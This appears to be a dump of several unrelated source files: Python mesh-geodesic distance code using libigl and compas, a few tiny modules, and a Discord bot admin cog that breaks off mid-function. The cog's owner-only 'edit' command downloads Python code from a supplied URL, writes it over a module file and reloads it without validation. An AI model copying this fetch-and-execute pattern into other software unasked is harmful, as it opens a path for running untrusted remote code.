# l_value = abs(self.long_way - way)
# s_value = abs(self.short_way - way)
# wid = width
# if self.ave_way - way >= 0:
# ## define the short side ##
# value = wid * ((1/(s_value+1))**0.3) - wid * ((1/abs(self.short_way -self.ave_way))**0.3) * (1 + flat_ratio)
# else:
# ## define the long side ##
# value = wid * ((1/(l_value+1))**0.15) - wid * ((1/abs(self.long_way - self.ave_way))**0.15) * (1 + flat_ratio)
# if value < 0: value = 0
# addv = value * (0.5 - abs(0.5-time))
#
# dif = (d01 - addv/2)*time - (d00)*(1-time)
# difs01.append(dif)
# return difs01
#
# ## for distance gap ##
# def custom_differences_02_first(self, time):
# """
# diftype == 2.1
# """
# width = (self.short_way * self.gap_ratio)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.ave_way - way)
# check_value = abs(self.ave_way - self.long_way)
# wid = width
# if (self.ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = ((d01 - addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# return difs00
#
# def custom_differences_02_second(self, time):
# """
# diftype == 2.2
# """
# width = (self.short_way * self.gap_ratio)
# difs01 = []
# time_ = time
# for d00, d01 in zip(self.distances_list[0], self.distances_list[1]):
# way = d00 + d01
# x = abs(self.ave_way - way)
# check_value = abs(self.ave_way - self.long_way)
# wid = width
# if (self.ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time_))
# dif01 = ((d01 + addv) * time_ - d00 * (1 - time_))
# difs01.append(dif01)
# return difs01
######################################
## calculating distance attribution ##
class Distance_Attributes_two:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributes_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.5, frequency=1.0, longWayExtention=False):
attrs = []
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
for D_00, D_01, way in zip(distances_00, distances_01, self.way_list):
x = (way / self.long_way)
compare = self.short_way / self.long_way
freq = frequency ## from 1 to 3 ##
alpha = freq * math.pi * (x - compare) / (1 - compare)
a = minValue
            ## formula for the distortion ##
if not longWayExtention:
                ## short way extension ##
y = (((1 - a) / 2) + ((a + 1) / 4)) * math.sin(alpha) + ((a + 1) / 2) + ((a + 1) / 4)
if y > 1: y = 1
else:
                ## long way extension ##
y = (((1 - a) / 2) + ((a + 1) / 4)) * math.cos(alpha) + ((a + 1) / 2) + ((a + 1) / 4)
if y > 1: y = 1
            ## distribute the boundary area depending on the distance calculation with the distortion formula ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
## set base distance ##
base_distance = d_00
target_distance = d_01
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1 - time) * y
## set base distance ##
base_distance = d_01
target_distance = d_00
else:
print("error with setting the base_boundary_num")
break
## select the short value ##
short_distance = min([d_00, d_01])
if short_distance == d_00:
attr = 0
else:
attr = 1
attrs.append(attr)
## calculate differences ##
dif = base_distance - target_distance
difs.append(dif)
return attrs, difs
class Distance_Attributes_three:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
# distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributes_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.75, frequency=2.0, longWayExtention=False):
attrs = []
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
distances_02 = self.distances_list[2]
for D_00, D_01, D_02, way in zip(distances_00, distances_01, distances_02, self.way_list):
# x = way / self.long_way
# compare = self.short_way / self.long_way
x = (self.long_way - way) / (self.long_way - self.short_way)
## x is changing from 0 with long_way to 1 with short_way ##
freq = frequency
alpha = freq * math.pi * x
a = minValue
            ## formula for the distortion ##
if longWayExtention:
                ## short way extension ##
y = ((1 - a) / 2) * math.sin(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
else:
                ## long way extension ##
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
            ## distribute the boundary area depending on the distance calculation with the distortion formula ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
d_02 = D_02 * (time)
## set base distance ##
base_dist = d_00
target_dists = [d_01, d_02]
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1-time) * y
d_02 = D_02 * (time)
## set base distance ##
base_dist = d_01
target_dists = [d_00, d_02]
elif base_boundary_num == 2:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (1-time) * y
## set base distance ##
base_dist = d_02
target_dists = [d_00, d_01]
else:
print("error with setting the base_boundary_num")
break
## select short value ##
short_distance = min([d_00, d_01, d_02])
if short_distance == d_00:
attr = 0
elif short_distance == d_01:
attr = 1
else:
attr = 2
attrs.append(attr)
## calculate differences ##
dif = base_dist - min(target_dists)
difs.append(dif)
return attrs, difs
class Distance_Attributes_four:
def __init__(self, MESH, boundary_vertex_keys_list):
self.mesh = MESH
self.bvkl = boundary_vertex_keys_list
self.boundary_num = len(self.bvkl)
## settings ##
self.distances_list = self.get_distances_list_from_every_boundary()
self.short_way, self.long_way, self.ave_way, self.way_list \
= self.get_short_long_ave_way_length_on_every_vertex()
self.gap_ratio = self.get_gap_ratio()
def get_distances_list_from_every_boundary(self):
distances_list = []
for boundary_vkeys in self.bvkl:
distances = list(compute_geodesic_to_every_vertex(self.mesh, boundary_vkeys))
distances_list.append(distances)
return distances_list
## calculating ##
def get_short_long_ave_way_length_on_every_vertex(self):
vkeys = self.mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in self.distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(self):
gap_ratio = (self.long_way - self.short_way) / self.long_way
return gap_ratio
def get_attributs_from_one_base_boundary(self, base_boundary_num, time,
minValue=0.75, frequency=2.0, longWayExtention=False):
attrs = []
difs = []
distances_00 = self.distances_list[0]
distances_01 = self.distances_list[1]
distances_02 = self.distances_list[2]
distances_03 = self.distances_list[3]
for D_00, D_01, D_02, D_03, way in zip(distances_00,
distances_01,
distances_02,
distances_03,
self.way_list):
x = (self.long_way - way) / (self.long_way - self.short_way)
## x is changing from 0 at long_way to 1 at short_way ##
freq = frequency
alpha = freq * math.pi * x
a = minValue
            ## formula for the distortion ##
if longWayExtention:
                ## short way extension ##
y = ((1 - a) / 2) * math.sin(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
else:
                ## long way extension ##
y = ((1 - a) / 2) * math.cos(alpha) + ((a + 1) / 2)
if y > 1:
y = 1
elif y < a:
y = a
            ## distribute the boundary area depending on the distance calculation with the distortion formula ##
if base_boundary_num == 0:
d_00 = D_00 * (1-time) * y
d_01 = D_01 * (time)
d_02 = D_02 * (time)
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_00
target_dists = [d_01, d_02, d_03]
elif base_boundary_num == 1:
d_00 = D_00 * (time)
d_01 = D_01 * (1-time) * y
d_02 = D_02 * (time)
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_01
target_dists = [d_00, d_02, d_03]
elif base_boundary_num == 2:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (1-time) * y
d_03 = D_03 * (time)
## set base distance ##
base_dist = d_02
target_dists = [d_00, d_01, d_03]
elif base_boundary_num == 3:
d_00 = D_00 * (time)
d_01 = D_01 * (time)
d_02 = D_02 * (time)
d_03 = D_03 * (1-time) * y
## set base distance ##
base_dist = d_03
target_dists = [d_00, d_01, d_02]
else:
print("error with setting the base_boundary_num")
break
## select short value ##
short_distance = min([d_00, d_01, d_02, d_03])
if short_distance == d_00:
attr = 0
elif short_distance == d_01:
attr = 1
elif short_distance == d_02:
attr = 2
else:
attr = 3
attrs.append(attr)
## calculate differences ##
dif = base_dist - min(target_dists)
difs.append(dif)
return attrs, difs
##################################################################################
## fundamental geodesics ##
##################################################################################
def compute_geodesic_to_every_vertex(mesh, vertices_start):
"""
    compute distances from several vertices to all vertices of the mesh
vertices are described with keys
"""
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_target = np.arange(len(v)) # all vertices are targets
vstart = np.array(vertices_start)
distances = igl.exact_geodesic(v, f, vstart, vertices_target)
return distances
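## Minimal usage sketch (hedged; assumes compas and libigl are installed): exact
## geodesic distances from vertex 0 of a unit tetrahedron to every vertex, via
## the helper above.
def _demo_geodesic():
    vertices = [(0.0, 0.0, 0.0), (1.0, 0.0, 0.0), (0.0, 1.0, 0.0), (0.0, 0.0, 1.0)]
    faces = [(0, 2, 1), (0, 1, 3), (0, 3, 2), (1, 2, 3)]
    tet = Mesh.from_vertices_and_faces(vertices, faces)
    return compute_geodesic_to_every_vertex(tet, [0])  # distances to all 4 vertices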
def compute_geodesic_from_start_to_target_vkeys(mesh, start_v_keys_list, target_v_keys_list):
"""
    compute distances from one edge to another edge and get the longest and shortest way
"""
v, f = mesh.to_vertices_and_faces()
v = np.array(v)
f = np.array(f)
vertices_start = np.array(start_v_keys_list)
vertices_target = np.array(target_v_keys_list)
distances = igl.exact_geodesic(v, f, vertices_start, vertices_target)
return distances
def get_distances_list_from_every_boundary(mesh, boundary_vertex_keys_list):
distances_list = []
for seam_vkeys in boundary_vertex_keys_list:
distances = list(compute_geodesic_to_every_vertex(mesh, seam_vkeys))
distances_list.append(distances)
return distances_list
## get way information ##
def calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list):
distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
vkeys = mesh.vertices()
way_list = []
for vkey in vkeys:
vdis_list = [distances[vkey] for distances in distances_list]
vdis_list.sort()
d00 = vdis_list[0]
d01 = vdis_list[1]
way = d00 + d01
way_list.append(way)
temp_list = [way for way in way_list]
temp_list.sort()
short_way = temp_list[0]
long_way = temp_list[-1]
ave_way = sum(temp_list) / len(temp_list)
return short_way, long_way, ave_way, way_list
def get_gap_ratio(mesh, boundary_vertex_keys_list):
short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, boundary_vertex_keys_list)
gap_ratio = (long_way - short_way) / long_way
return gap_ratio
# ##################################################################################
# ## combination of several types of geodesics in a mesh ##
# ##################################################################################
# def vertex_distribution_of_geodesic_realm(mesh, distances_list):
# # distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
# realm_dict = {}
# for i in range(len(distances_list)):
# realm_dict["seam_0" + str(i)] = []
# vkeys = mesh.vertices()
# for vkey in vkeys:
# dist_list = [distances[vkey] for distances in distances_list]
# closest = min(dist_list)
# seam_number = dist_list.index(closest)
# realm_dict["seam_0" + str(seam_number)].append(vkey)
# return realm_dict
#
# def custom_differences_00(mesh, distances_list, time):
# ## pure distance differences no additional distance ##
# global result
# # distances_list = get_distances_list_from_every_seams(mesh, seam_vertex_keys_list)
# vkeys = mesh.vertices()
# if len(distances_list) <= 2:
# difs = [abs(d01 * time - d00 * (1 - time)) for d00, d01 in zip(distances_list[0], distances_list[1])]
# result = difs
# elif len(distances_list) >= 3:
# difs_list = []
# for i in range(len(distances_list)):
# first_distances = distances_list[i]
# difs = []
# for vkey in vkeys:
# left_distances_list = []
# for j, distances in enumerate(distances_list):
# if j != i:
# left_distances_list.append(distances)
# dist_list = [distances[vkey] for distances in distances_list]
# first_seam_dist = first_distances[vkey]
# target_seam_dist = min(dist_list)
#
# d00 = first_seam_dist
# d01 = target_seam_dist
# dif = abs(d01*time - d00*(1-time))
# difs.append(dif)
# difs_list.append(difs)
# result = difs_list
# return result
#
# def custom_differences_01(mesh, seam_vertex_keys_list, time, width=50):
# """
# this transformed distances is for the connection detail between two seams
# """
# ## custom distance differences with changing offset ##
# distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
# short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(long_way - way)
# y = abs(ave_way - way)
# check_value = abs(long_way - ave_way)
# value = width * math.cos((2 * math.pi / (long_way - short_way)) * x)
# value = value * (1 - 1 / (y + 1))
# if value <= 0:
# value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5-time))
# dif = abs((d01 + addv) * time - d00 * (1 - time))
# difs00.append(dif)
# difs01 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(long_way - way)
# y = abs(ave_way - way)
# check_value = abs(long_way - ave_way)
# wid = width
# value = wid * math.cos((2 * math.pi / (long_way - short_way)) * x)
# # value = value * (1 - 1/(y+1))
# if value >= 0:
# value = 0
# else:
# value = value
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = abs((d01 + addv) * time - (d00) * (1 - time))
# difs01.append(dif01)
# difs_list = [difs00, difs01]
# return difs_list
#
# def custom_differences_02(mesh, seam_vertex_keys_list, time, gap_ratio):
# """
#
# this transformed distances is for the adapting way gap solution
#
# """
# ## custom distance differences with changing offset ##
# difs_list = []
# distances_list = get_distances_list_from_every_boundary(mesh, seam_vertex_keys_list)
# short_way, long_way, ave_way, Ds_list = calculate_way_length_on_every_vertex(mesh, seam_vertex_keys_list)
# width = (short_way * gap_ratio)
# ## get the differences from start seam and from last seam ##
# difs00 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(ave_way - way)
# check_value = abs(ave_way - long_way)
# wid = width
# if (ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif00 = abs((d01 - addv) * time - d00 * (1 - time))
# difs00.append(dif00)
# difs01 = []
# for d00, d01 in zip(distances_list[0], distances_list[1]):
# way = d00 + d01
# x = abs(ave_way - way)
# check_value = abs(ave_way - long_way)
# wid = width
# if (ave_way - way) >= 0:
# ## make the value smoother ##
# value = wid * ((x / check_value) ** 1.5) * (1 - 1 / (x + 1))
# else:
# value = 0
# addv = value * (0.5 - abs(0.5 - time))
# dif01 = abs((d01 + addv) * time - d00 * (1 - time))
# difs01.append(dif01)
# difs_list = [difs00, difs01]
# return difs_list
#
"""
"""
#############################################################################
## for offsetting path points ##
#############################################################################
def get_closest_points_from_pts_cloud(fromPt, toPtsCloud, num_getPts):
    ## sort the cloud once by distance to fromPt; this also handles tied distances,
    ## which the previous re-matching loop could duplicate ##
    sorted_pts = sorted(toPtsCloud, key=lambda toPt: fromPt.distance_to_point(toPt))
    closest_pts = sorted_pts[:num_getPts]
    closest_distances = [fromPt.distance_to_point(toPt) for toPt in closest_pts]
    if num_getPts == 1:
        return closest_pts[0], closest_distances[0]
    return closest_pts, closest_distances
def get_distance_to_pts_cloud(fromPt, toPtsCloud):
closest_pts, closest_distances = get_closest_points_from_pts_cloud(fromPt, toPtsCloud, 3)
closest_distance = closest_distances[0]
    ## interpolate between the three closest points, keeping whichever candidate
    ## lies nearest to fromPt; each zero-distance hit returns immediately ##
    ## candidate from the first two points (inverse-distance weighting) ##
    measure = closest_distances[0] + closest_distances[1]
    x = (closest_distances[1] / measure) * closest_pts[0].x + (closest_distances[0] / measure) * closest_pts[1].x
    y = (closest_distances[1] / measure) * closest_pts[0].y + (closest_distances[0] / measure) * closest_pts[1].y
    z = (closest_distances[1] / measure) * closest_pts[0].z + (closest_distances[0] / measure) * closest_pts[1].z
    point_00 = Point(x, y, z)
    distance_00 = fromPt.distance_to_point(point_00)
    if distance_00 == 0:
        return 0, point_00
    ## candidate from the first and third points ##
    measure = closest_distances[0] + closest_distances[2]
    x = (closest_distances[0] / measure) * closest_pts[2].x + (closest_distances[2] / measure) * closest_pts[0].x
    y = (closest_distances[0] / measure) * closest_pts[2].y + (closest_distances[2] / measure) * closest_pts[0].y
    z = (closest_distances[0] / measure) * closest_pts[2].z + (closest_distances[2] / measure) * closest_pts[0].z
    point_01 = Point(x, y, z)
    distance_01 = fromPt.distance_to_point(point_01)
    if distance_01 == 0:
        return 0, point_01
    ## candidate between the two interpolated points ##
    measure = distance_00 + distance_01
    x = (distance_01 / measure) * point_01.x + (distance_00 / measure) * point_00.x
    y = (distance_01 / measure) * point_01.y + (distance_00 / measure) * point_00.y
    z = (distance_01 / measure) * point_01.z + (distance_00 / measure) * point_00.z
    clpt00 = Point(x, y, z)
    cld00 = fromPt.distance_to_point(clpt00)
    if cld00 == 0:
        return 0, clpt00
    ## candidate between the closest cloud point and the previous candidate ##
    measure = closest_distances[0] + cld00
    x = (closest_distances[0] / measure) * clpt00.x + (cld00 / measure) * closest_pts[0].x
    y = (closest_distances[0] / measure) * clpt00.y + (cld00 / measure) * closest_pts[0].y
    z = (closest_distances[0] / measure) * clpt00.z + (cld00 / measure) * closest_pts[0].z
    cl_point = Point(x, y, z)
    cl_distance = fromPt.distance_to_point(cl_point)
    ## return the best of all candidates ##
    cllist = [closest_distance, distance_00, distance_01, cld00, cl_distance]
    clptlist = [closest_pts[0], point_00, point_01, clpt00, cl_point]
    cl_distance = min(cllist)
    cl_point = clptlist[cllist.index(cl_distance)]
    return cl_distance, cl_point
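# Hedged demo of the closest-point helpers above; assumes Point is
# compas.geometry.Point, consistent with the distance_to_point calls in this file.
if __name__ == '__main__':
    from compas.geometry import Point
    cloud = [Point(0, 0, 0), Point(1, 0, 0), Point(0, 1, 0), Point(1, 1, 0)]
    distance, closest = get_distance_to_pts_cloud(Point(0.4, 0.4, 1.0), cloud)
    ## distance is at most the raw distance to the nearest cloud point, since the
    ## interpolation candidates can only improve on closest_distances[0] ##
    print(distance, closest)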
# ---- examples/chalicelib/blueprints/__init__.py | cuenca-mx/agave @ d4719bdbab8e200c98d206475df6adb275e9fdcc | MIT | 196 bytes ----
__all__ = ['AuthedRestApiBlueprint']
from agave.blueprints import RestApiBlueprint
from .authed import AuthedBlueprint
class AuthedRestApiBlueprint(AuthedBlueprint, RestApiBlueprint):
...
# ---- Section09_Decorator/Practice/Square.py | enriqueescobar-askida/Kinito.Python @ e4c5521e771c4de0ceaf81776a4a61f7de01edb4 | MIT | 132 bytes ----
class Square:
def __init__(self, side):
self.side = side
def __str__(self):
return 'A square with side %s' % self.side
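# Small usage sketch of the class above.
if __name__ == '__main__':
    square = Square(5)
    print(square)  # -> A square with side 5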
# ---- vogue/commands/__init__.py | mayabrandi/vogue @ 463e6417a9168eadb0d11dea2d0f97919494bcd3 | MIT | 22 bytes ----
from .base import cli
# ---- cogs/admin.py | TheRealKeto/Phantom @ fa38bb4aa81b33583a345d10a77572acdbafd389 | MIT | 14,220 bytes ----
from discord.ext import commands
import aiofiles
import aiohttp
import aiosqlite
import asyncio
import discord
import glob
import math
import time
import platform
class Admin(commands.Cog):
def __init__(self, bot):
self.bot = bot
def get_modules(self):
if platform.system() == 'Windows':
modules = glob.glob('cogs\*.py')
else:
modules = glob.glob('cogs/*.py')
return sorted([module.replace('/', '.').replace('\\', '.')[:-3].split('.')[-1] for module in modules])
@commands.group(invoke_without_command=True)
@commands.is_owner()
async def module(self, ctx):
if ctx.prefix == f'<@!{self.bot.user.id}> ':
prefix = f'{ctx.prefix}`'
else:
prefix = f'`{ctx.prefix}'
embed = discord.Embed(title='Module Commands')
embed.add_field(name='Edit', value=f'{prefix}module edit <module>`', inline=False)
embed.add_field(name='List', value=f'{prefix}module list`', inline=False)
embed.add_field(name='Load', value=f'{prefix}module load <module>`', inline=False)
embed.add_field(name='Reload', value=f'{prefix}module reload <all/module>`', inline=False)
embed.add_field(name='Unload', value=f'{prefix}module unload <module>`', inline=False)
embed.add_field(name='Note:', value='Use commas to separate multiple modules.', inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def edit(self, ctx, *modules):
local_modules = self.get_modules()
modules = [module.lower() for module in modules]
if len(modules) > 1:
embed = discord.Embed(title='Edit Module')
            embed.add_field(name='Error', value='You can only edit one module at a time!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
if modules[0] not in local_modules:
embed = discord.Embed(title='Edit Module')
            embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!')
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
embed = discord.Embed(title='Edit Module', description=f'Send a link to the raw code you wish to update the `{modules[0]}` module to.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
try:
answer = await self.bot.wait_for('message', check=lambda message: message.author == ctx.author, timeout=60)
except asyncio.exceptions.TimeoutError:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value='No response given in 1 minute, cancelling.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
await answer.delete()
async with aiofiles.open(f'cogs/{modules[0]}.py', 'r') as f:
old_module = await f.read()
try:
async with aiohttp.ClientSession() as session:
async with session.get(answer.content) as response:
                    new_module = (await response.text()).replace('    ', '\t')  # normalise space indents to tabs
except aiohttp.client_exceptions.InvalidURL:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value='Response is not a valid URL.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
if old_module == new_module:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'URL content is the same as current module `{modules[0]}` content.')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
return
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(new_module)
try:
self.bot.reload_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Edit Module', description=f'Module `{modules[0]}` has been reloaded.')
except discord.ext.commands.ExtensionNotLoaded: # Attempt to load module
try:
self.bot.load_extension(f'cogs.{modules[0]}')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, reverting to backup!')
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(old_module)
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Edit Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, reverting to backup!')
async with aiofiles.open(f'cogs/{modules[0]}.py', 'w') as f:
await f.write(old_module)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await message.edit(embed=embed)
@module.command(name='list')
@commands.guild_only()
@commands.is_owner()
async def _list(self, ctx):
local_modules = self.get_modules()
embed = discord.Embed(title='All Modules', description=f"`{'`, `'.join(local_modules)}`")
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command()
@commands.is_owner()
@commands.guild_only()
async def load(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Load Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
            successful_loads = 0
            failed_loads = 0
for module in (local_modules if modules[0] == 'all' else modules):
if not any(module == x for x in local_modules):
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
continue
try:
self.bot.load_extension(f'cogs.{module}')
                    embed.add_field(name='Success', value=f'Module `{module}` successfully loaded!', inline=False)
await message.edit(embed=embed)
successful_loads += 1
except discord.ext.commands.ExtensionAlreadyLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is already loaded!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
except discord.ext.commands.ExtensionFailed:
embed.add_field(name='Error', value=f'Module `{module}` has an error, cannot load!', inline=False)
await message.edit(embed=embed)
failed_loads += 1
embed.add_field(name='Finished', value=f"**{successful_loads}** module{'s' if successful_loads != 1 else ''} successfully loaded, **{failed_loads}** module{'s' if failed_loads != 1 else ''} failed to load.")
await message.edit(embed=embed)
return
if not any(modules[0] == x for x in local_modules):
            embed = discord.Embed(title='Load Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
self.bot.load_extension(f'cogs.{modules[0]}')
embed = discord.Embed(title='Load Module', description=f'Module `{modules[0]}` has been loaded.')
except discord.ext.commands.ExtensionAlreadyLoaded:
embed = discord.Embed(title='Load Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` is already loaded!')
except discord.ext.commands.ExtensionFailed:
embed = discord.Embed(title='Load Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` has an error, cannot load!')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
@module.command(name='reload')
@commands.is_owner()
@commands.guild_only()
async def _reload(self, ctx, *modules):
local_modules = self.get_modules()
modules = sorted([module.lower() for module in modules])
if len(modules) > 1 or modules[0] == 'all':
embed = discord.Embed(title='Reload Module')
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
message = await ctx.send(embed=embed)
            successful_reloads = 0
            failed_reloads = 0
for module in (local_modules if modules[0] == 'all' else modules):
if module not in local_modules:
embed.add_field(name='Error', value=f'Module `{module}` does not exist!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
continue
try:
self.bot.reload_extension(f'cogs.{module}')
embed.add_field(name='Success', value=f'Module `{module}` successfully reloaded!', inline=False)
await message.edit(embed=embed)
successful_reloads += 1
except discord.ext.commands.ExtensionNotLoaded:
embed.add_field(name='Error', value=f'Module `{module}` is not currently loaded!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
except discord.ext.commands.ExtensionFailed:
embed.add_field(name='Error', value=f'Module `{module}` failed to reload!', inline=False)
await message.edit(embed=embed)
failed_reloads += 1
embed.add_field(name='Finished', value=f"**{successful_reloads}** module{'s' if successful_reloads != 1 else ''} successfully reloaded, **{failed_reloads}** module{'s' if failed_reloads != 1 else ''} failed to reload.")
await message.edit(embed=embed)
return
if modules[0] not in local_modules:
embed = discord.Embed(title='Reload Module')
embed.add_field(name='Error', value=f'Module `{modules[0]}` does not exist!', inline=False)
embed.add_field(name='Available modules:', value=f"`{'`, `'.join(local_modules)}`", inline=False)
embed.set_footer(text=ctx.author.display_name, icon_url=ctx.author.avatar_url_as(static_format='png'))
await ctx.send(embed=embed)
return
try:
